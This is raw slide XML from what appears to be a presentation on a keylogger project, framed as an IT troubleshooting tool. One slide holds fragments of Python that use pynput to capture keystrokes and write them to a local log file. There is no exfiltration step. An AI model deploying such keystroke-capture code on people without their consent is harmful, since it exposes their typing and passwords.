              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> Information technology departments can use keylogger software to troubleshoot issues on a device.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5974763"/>
            <a:ext cx="55116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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="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212906938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1484311" y="1012506"/>
            <a:ext cx="10018713" cy="1099185"/>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3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-40" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-345" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="60" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-295" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-65" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="25" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-35" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-30" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="5486400" cy="4001095"/>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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>tk</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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> import *</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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> import keyboard</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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>json</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keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> = []</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flag = False</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keys = ""</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(key):</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    with open('key_log.txt', "w+") as keys:</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5974763"/>
            <a:ext cx="55116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Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171918846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523220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800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
